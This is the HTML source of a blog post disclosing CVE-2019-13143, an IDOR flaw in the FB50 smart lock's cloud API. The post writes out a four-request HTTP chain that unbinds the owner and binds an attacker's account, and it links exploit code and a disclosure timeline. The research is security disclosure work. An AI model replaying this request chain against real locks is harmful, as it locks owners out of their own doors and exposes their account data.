build/blog/fb50/index.html (view raw)
1<!DOCTYPE html>
2<html lang=en>
3<link rel="stylesheet" href="/static/style.css" type="text/css">
4<link rel="stylesheet" href="/static/syntax.css" type="text/css">
5<link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico">
6<meta name="description" content="… and lessons learnt in IoT security">
7<meta name="viewport" content="initial-scale=1">
8<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
9<meta content="#021012" name="theme-color">
10<meta name="HandheldFriendly" content="true">
11<meta name="twitter:card" content="summary_large_image">
12<meta name="twitter:site" content="@icyphox">
13<meta name="twitter:title" content="Picking the FB50 smart lock (CVE-2019-13143)">
14<meta name="twitter:description" content="… and lessons learnt in IoT security">
15<meta name="twitter:image" content="/static/icyphox.png">
16<meta property="og:title" content="Picking the FB50 smart lock (CVE-2019-13143)">
17<meta property="og:type" content="website">
18<meta property="og:description" content="… and lessons learnt in IoT security">
19<meta property="og:url" content="https://icyphox.sh">
20<meta property="og:image" content="/static/icyphox.png">
21<html>
22 <title>
23 Picking the FB50 smart lock (CVE-2019-13143)
24 </title>
25<div class="container-text">
26 <header class="header">
27
28 <a href="/">home</a>
29 <a href="/blog">blog</a>
30 <a href="/reading">reading</a>
31 <a href="https://twitter.com/icyphox">twitter</a>
32 <a href="/about">about</a>
33
34 </header>
35<body>
36 <div class="content">
37 <div align="left">
38 <code>2019-08-05</code>
39 <h1>Picking the FB50 smart lock (CVE-2019-13143)</h1>
40 <h2>… and lessons learnt in IoT security</h2>
41 <p>(<em>originally posted at <a href="http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure">SecureLayer7’s Blog</a>, with my edits</em>)</p>
42
43<h3 id="the-lock">The lock</h3>
44
45<p>The lock in question is the FB50 smart lock, manufactured by Shenzhen
46Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands
47across many ecommerce sites, and has over, an estimated, 15k+ users.</p>
48
49<p>The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
50the Play/App Store to function. The app requires the user to create an
51account before further functionality is available.
52It also facilitates configuring the fingerprint,
53and unlocking from a range via Bluetooth.</p>
54
55<p>We had two primary attack surfaces we decided to tackle — Bluetooth (BLE)
56and the Android app.</p>
57
58<h3 id="via-bluetooth-low-energy-ble">Via Bluetooth Low Energy (BLE)</h3>
59
60<p>Android phones have the ability to capture Bluetooth (HCI) traffic
61which can be enabled under Developer Options under Settings. We made
62around 4 “unlocks” from the Android phone, as seen in the screenshot.</p>
63
64<p><img src="/static/img/bt_wireshark.png" alt="wireshark packets" /></p>
65
66<p>This is the value sent in the <code>Write</code> request:</p>
67
68<p><img src="/static/img/bt_ws_value.png" alt="wireshark write req" /></p>
69
70<p>We attempted replaying these requests using <code>gattool</code> and <code>gattacker</code>,
71but that didn’t pan out, since the value being written was encrypted.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
72
73<h3 id="via-the-android-app">Via the Android app</h3>
74
75<p>Reversing the app using <code>jd-gui</code>, <code>apktool</code> and <code>dex2jar</code> didn’t get us too
76far since most of it was obfuscated. Why bother when there exists an
77easier approach – BurpSuite.</p>
78
79<p>We captured and played around with a bunch of requests and responses,
80and finally arrived at a working exploit chain.</p>
81
82<h3 id="the-exploit">The exploit</h3>
83
84<p>The entire exploit is a 4 step process consisting of authenticated
85HTTP requests:</p>
86
87<ol>
88<li>Using the lock’s MAC (obtained via a simple Bluetooth scan in the
89vicinity), get the barcode and lock ID</li>
90<li>Using the barcode, fetch the user ID</li>
91<li>Using the lock ID and user ID, unbind the user from the lock</li>
92<li>Provide a new name, attacker’s user ID and the MAC to bind the attacker
93to the lock</li>
94</ol>
95
96<p>This is what it looks like, in essence (personal info redacted).</p>
97
98<h4 id="request-1">Request 1</h4>
99
100<pre><code>POST /oklock/lock/queryDevice
101{"mac":"XX:XX:XX:XX:XX:XX"}
102</code></pre>
103
104<p>Response:</p>
105
106<pre><code>{
107 "result":{
108 "alarm":0,
109 "barcode":"<BARCODE>",
110 "chipType":"1",
111 "createAt":"2019-05-14 09:32:23.0",
112 "deviceId":"",
113 "electricity":"95",
114 "firmwareVersion":"2.3",
115 "gsmVersion":"",
116 "id":<LOCK ID>,
117 "isLock":0,
118 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
119 "lockPwd":"000000",
120 "mac":"XX:XX:XX:XX:XX:XX",
121 "name":"lock",
122 "radioName":"BlueFPL",
123 "type":0
124 },
125 "status":"2000"
126}
127</code></pre>
128
129<h4 id="request-2">Request 2</h4>
130
131<pre><code>POST /oklock/lock/getDeviceInfo
132
133{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
134</code></pre>
135
136<p>Response:</p>
137
138<pre><code> "result":{
139 "account":"email@some.website",
140 "alarm":0,
141 "barcode":"<BARCODE>",
142 "chipType":"1",
143 "createAt":"2019-05-14 09:32:23.0",
144 "deviceId":"",
145 "electricity":"95",
146 "firmwareVersion":"2.3",
147 "gsmVersion":"",
148 "id":<LOCK ID>,
149 "isLock":0,
150 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
151 "lockPwd":"000000",
152 "mac":"XX:XX:XX:XX:XX:XX",
153 "name":"lock",
154 "radioName":"BlueFPL",
155 "type":0,
156 "userId":<USER ID>
157 }
158</code></pre>
159
160<h4 id="request-3">Request 3</h4>
161
162<pre><code>POST /oklock/lock/unbind
163
164{"lockId":"<LOCK ID>","userId":<USER ID>}
165</code></pre>
166
167<h4 id="request-4">Request 4</h4>
168
169<pre><code>POST /oklock/lock/bind
170
171{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
172</code></pre>
173
174<h3 id="thats-it-the-scary-stuff">That’s it! (& the scary stuff)</h3>
175
176<p>You should have the lock transferred to your account. The severity of this
177issue lies in the fact that the original owner completely loses access to
178their lock. They can’t even “rebind” to get it back, since the current owner
179(the attacker) needs to authorize that. </p>
180
181<p>To add to that, roughly 15,000 user accounts’ info are exposed via IDOR.
182Ilja, a cool dude I met on Telegram, noticed locks named “carlock”,
183“garage”, “MainDoor”, etc.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup> This is terrifying.</p>
184
185<p><em>shudders</em></p>
186
187<h3 id="proof-of-concept">Proof of Concept</h3>
188
189<p><a href="https://twitter.com/icyphox/status/1158396372778807296">PoC Video</a></p>
190
191<p><a href="https://github.com/icyphox/pwnfb50">Exploit code</a></p>
192
193<h3 id="disclosure-timeline">Disclosure timeline</h3>
194
195<ul>
196<li><strong>26th June, 2019</strong>: Issue discovered at SecureLayer7, Pune</li>
197<li><strong>27th June, 2019</strong>: Vendor notified about the issue</li>
198<li><strong>2nd July, 2019</strong>: CVE-2019-13143 reserved</li>
199<li>No response from vendor</li>
200<li><strong>2nd August 2019</strong>: Public disclosure</li>
201</ul>
202
203<h3 id="lessons-learnt">Lessons learnt</h3>
204
205<p><strong>DO NOT</strong>. Ever. Buy. A smart lock. You’re better off with the “dumb” ones
206with keys. With the IoT plague spreading, it brings in a large attack surface
207to things that were otherwise “unhackable” (try hacking a “dumb” toaster).</p>
208
209<p>The IoT security scene is rife with bugs from over 10 years ago, like
210executable stack segments<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, hardcoded keys, and poor development
211practices in general.</p>
212
213<p>Our existing threat models and scenarios have to be updated to factor
214in these new exploitation possibilities. This also broadens the playing
215field for cyber warfare and mass surveillance campaigns. </p>
216
217<h3 id="researcher-info">Researcher info</h3>
218
219<p>This research was done at <a href="https://securelayer7.net">SecureLayer7</a>, Pune, IN by:</p>
220
221<ul>
222<li>Anirudh Oppiliappan (me)</li>
223<li>S. Raghav Pillai (<a href="https://twitter.com/_vologue">@_vologue</a>)</li>
224<li>Shubham Chougule (<a href="https://twitter.com/shubhamtc">@shubhamtc</a>)</li>
225</ul>
226
227<div class="footnotes">
228<hr />
229<ol>
230<li id="fn-1">
231<p><a href="https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/">This</a> article discusses a similar smart lock, but they broke the encryption. <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
232</li>
233
234<li id="fn-2">
235<p>Thanks to Ilja Shaposhnikov (@drakylar). <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
236</li>
237
238<li id="fn-3">
239<p><a href="https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf">PDF</a> <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
240</li>
241</ol>
242</div>
243
244 </div>
245 <hr />
246 <p class="muted">Questions or comments? Open an issue at <a href="https://github.com/icyphox/site">this repo</a>, or send a plain-text email to <a href="mailto:x@icyphox.sh">x@icyphox.sh</a>.</p>
247 <footer>
248 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
249 <img src="https://licensebuttons.net/l/by-nc-sa/4.0/80x15.png">
250 </a>
251 </footer>
252 </body>
253 </div>
254 </html>